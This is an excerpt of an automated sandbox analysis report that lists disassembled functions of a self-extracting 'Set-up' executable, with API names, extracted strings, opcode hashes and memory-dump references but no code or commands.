                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorH_prologLast
                                                                                                                                                  • String ID: Can not create output directory
                                                                                                                                                  • API String ID: 1057991267-273059976
                                                                                                                                                  • Opcode ID: c1585e90ad253acb921944d1b99736576443f6b2b823fb71bb5baad655427db2
                                                                                                                                                  • Instruction ID: 94d60411cd6cf427b4c6921736d61359ac470b1df10c21b98d62f11ee466eb8e
                                                                                                                                                  • Opcode Fuzzy Hash: c1585e90ad253acb921944d1b99736576443f6b2b823fb71bb5baad655427db2
                                                                                                                                                  • Instruction Fuzzy Hash: F3A1BF70C04249EFCF11EFA4C8549EEBBB5AF18308F20406EE855B7291DB385E45DB6A
                                                                                                                                                  Function 0042DD5D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042DD62
                                                                                                                                                    • Part of subcall function 0042EE86: __EH_prolog.LIBCMT ref: 0042EE8B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: wR@$B
                                                                                                                                                  • API String ID: 3519838083-3713363123
                                                                                                                                                  • Opcode ID: de4029d30ef0f8f627baeaeed33dad3b305af7877365ad25aa3e6b510ee2ce14
                                                                                                                                                  • Instruction ID: a89f0caad5b5c5ca7789c776479350928307cb1053976c2bf9fb98fec2cd7b40
                                                                                                                                                  • Opcode Fuzzy Hash: de4029d30ef0f8f627baeaeed33dad3b305af7877365ad25aa3e6b510ee2ce14
                                                                                                                                                  • Instruction Fuzzy Hash: A0C13A70E00268DFDB14DF94C985BEEBBB4BF14318F14809EE905A7281DB786A45CB66
                                                                                                                                                  Function 0042D334 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042D339
                                                                                                                                                    • Part of subcall function 00428229: __EH_prolog.LIBCMT ref: 0042822E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $wR@
                                                                                                                                                  • API String ID: 3519838083-2271011043
                                                                                                                                                  • Opcode ID: 9391acb2885a2d43f2ed7551b5062c8b59cf924c08f4ae8d9f60bd3031d2459e
                                                                                                                                                  • Instruction ID: 3a40a4e534d3beb5bf4c537fda60f338fcd9a00d64a4a41d380eb200ca8b15a4
                                                                                                                                                  • Opcode Fuzzy Hash: 9391acb2885a2d43f2ed7551b5062c8b59cf924c08f4ae8d9f60bd3031d2459e
                                                                                                                                                  • Instruction Fuzzy Hash: CA719331E002199FCF14EFA5D5816AEB7B1FF44318F50412FE416A7692CB38AD45CBA9
                                                                                                                                                  Function 0041310D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 189COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: %5A$d3A
                                                                                                                                                  • API String ID: 3519838083-2767413505
                                                                                                                                                  • Opcode ID: ecc0fe47c9a924543f1becdffa4d46a5f57dff026682a3ddd98b229740b21387
                                                                                                                                                  • Instruction ID: 2da3029afb12af2f40fe5342b83832acd5b98b54bc351901cbc3e749e302741b
                                                                                                                                                  • Opcode Fuzzy Hash: ecc0fe47c9a924543f1becdffa4d46a5f57dff026682a3ddd98b229740b21387
                                                                                                                                                  • Instruction Fuzzy Hash: 2971AF71600245DFCB14DFA8C98499EBBE1FF44315B1489AEE85ADB351CB38EE81CB49
                                                                                                                                                  Function 0042CAAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $
                                                                                                                                                  • API String ID: 3519838083-227171996
                                                                                                                                                  • Opcode ID: 5d22a61501022fa1ef6c19f82d294658b39a3c367a11ee331ec8f500e0b646b7
                                                                                                                                                  • Instruction ID: 401e992827f1e5ee1ef7c2df62a3ed370906ef4e4740c61790c7d643f5ac8052
                                                                                                                                                  • Opcode Fuzzy Hash: 5d22a61501022fa1ef6c19f82d294658b39a3c367a11ee331ec8f500e0b646b7
                                                                                                                                                  • Instruction Fuzzy Hash: 1D718A31A0021ADFCB20DF9AE5C1AAEB7B1FF48314F50456ED41AA7281D774BA86CF54
                                                                                                                                                  Function 004250A3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004250A8
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: @$CRC
                                                                                                                                                  • API String ID: 3519838083-2751826776
                                                                                                                                                  • Opcode ID: 8e38feba59387b06d60022575a81e10160ec1c47a2feac4b93a661906a37c69e
                                                                                                                                                  • Instruction ID: 9a25a8439b5879feea3b3cbac0dbfaa570f645d854de97b3c5c9ab764cf3f2f8
                                                                                                                                                  • Opcode Fuzzy Hash: 8e38feba59387b06d60022575a81e10160ec1c47a2feac4b93a661906a37c69e
                                                                                                                                                  • Instruction Fuzzy Hash: B451E331A00118EBCF11EB91D881AEEB7B5EF44304F50806FE902772C1DB786E45CBAA
                                                                                                                                                  Function 0042C47E Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0042C483
                                                                                                                                                    • Part of subcall function 004075D4: __EH_prolog.LIBCMT ref: 004075D9
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: HCF$RSFX
                                                                                                                                                  • API String ID: 3519838083-3415502821
                                                                                                                                                  • Opcode ID: 85f2bc895109f9ea30f695160d6c9ffe0a4425ed44aac4f9595e986470cefd9b
                                                                                                                                                  • Instruction ID: a78c53e83ed20bd3efb8cc37cd7b30341356c0c967d0a8b0c8163bd8f507b5d5
                                                                                                                                                  • Opcode Fuzzy Hash: 85f2bc895109f9ea30f695160d6c9ffe0a4425ed44aac4f9595e986470cefd9b
                                                                                                                                                  • Instruction Fuzzy Hash: 0D51A370E001159BCB14EB91D8D19AFB3729F94354F50C52BE812A7381DB7CA942CBAA
                                                                                                                                                  Function 00471533 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Info
                                                                                                                                                  • String ID: $
                                                                                                                                                  • API String ID: 1807457897-3032137957
                                                                                                                                                  • Opcode ID: 9126253ed4df8a800f89eabd88dfa7c8242230fedd2ec87a70d7a1392de5d0ec
                                                                                                                                                  • Instruction ID: d76123435fc08ffee7341991f6c23c1f7fec3676eaefc47546e392dda9b50c1b
                                                                                                                                                  • Opcode Fuzzy Hash: 9126253ed4df8a800f89eabd88dfa7c8242230fedd2ec87a70d7a1392de5d0ec
                                                                                                                                                  • Instruction Fuzzy Hash: FB41493100425C1BEB128B1CCC49BFB7FAD9B06710F2840F7D14DD71B2C6694948CBAA
                                                                                                                                                  Function 0041FC11 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: BCJ $LZMA:
                                                                                                                                                  • API String ID: 3519838083-462996315
                                                                                                                                                  • Opcode ID: c98d3916ab67d2eaf563a9b03259cf8f5095812f7d13645ee2a08f44c8345535
                                                                                                                                                  • Instruction ID: 4dfeecf7b596f67c49ca3122baf61174b9f4d12c3e4134812c030892e8c7915e
                                                                                                                                                  • Opcode Fuzzy Hash: c98d3916ab67d2eaf563a9b03259cf8f5095812f7d13645ee2a08f44c8345535
                                                                                                                                                  • Instruction Fuzzy Hash: 1521713190024D9FCB14EFA5D4908EEB771FF00304B54857BE4229BA95F738998ADB88
                                                                                                                                                  Function 00413BB9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: $d3A
                                                                                                                                                  • API String ID: 3519838083-2463995834
                                                                                                                                                  • Opcode ID: b1d21273dab7fdf059b43a5d704ee22b8d7ee51ee2c31cab646739de4e937c2e
                                                                                                                                                  • Instruction ID: e9d4cec92bf99425eb0af7354a97034f5dc71dcd0a868ff908182896e053cc7f
                                                                                                                                                  • Opcode Fuzzy Hash: b1d21273dab7fdf059b43a5d704ee22b8d7ee51ee2c31cab646739de4e937c2e
                                                                                                                                                  • Instruction Fuzzy Hash: 9C21B071A002098BCF14DFA5C5855EEBB72FF5830AF60401FD401B7341EB785A85CBA9
                                                                                                                                                  Function 00417815 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                  • String ID: COM$LPT
                                                                                                                                                  • API String ID: 3519838083-915345583
                                                                                                                                                  • Opcode ID: 76a2da83e11e2d05ccfeeaebd1841f6466158b9b35046e6fb8c45d7aa1cb2d75
                                                                                                                                                  • Instruction ID: 6b0ef066b09de82b747c30dd307963e0cdfcc3e3973ecc499d2d1988d6bbd738
                                                                                                                                                  • Opcode Fuzzy Hash: 76a2da83e11e2d05ccfeeaebd1841f6466158b9b35046e6fb8c45d7aa1cb2d75
                                                                                                                                                  • Instruction Fuzzy Hash: FD11AF31E041158BCF04FF99C9445EEB3B2EF86358B10852FD112B7281C7785D85C7A9
                                                                                                                                                  Function 00406C9D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2301848939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2301683877.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2303934955.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304077485.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304216926.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304356346.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304634894.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2304824551.000000000048F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2305797147.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2307357382.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __aulldiv__aullrem
                                                                                                                                                  • String ID: ps@
                                                                                                                                                  • API String ID: 3839614884-3648969447
                                                                                                                                                  • Opcode ID: 81452285641003b07a928d5af906baab9b9d95d41fb3be511c48d80199f9e401
                                                                                                                                                  • Instruction ID: 56237b07e16783e9b741eac6974e50dd3be842716ee98cc4c7de778574ef2070
                                                                                                                                                  • Opcode Fuzzy Hash: 81452285641003b07a928d5af906baab9b9d95d41fb3be511c48d80199f9e401
                                                                                                                                                  • Instruction Fuzzy Hash: 9E016D72A08198BAFB119BA48C80AFFBFBCEF46314F120077D441E7341D2388D119366
                                                                                                                                                  Function 00406D15 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
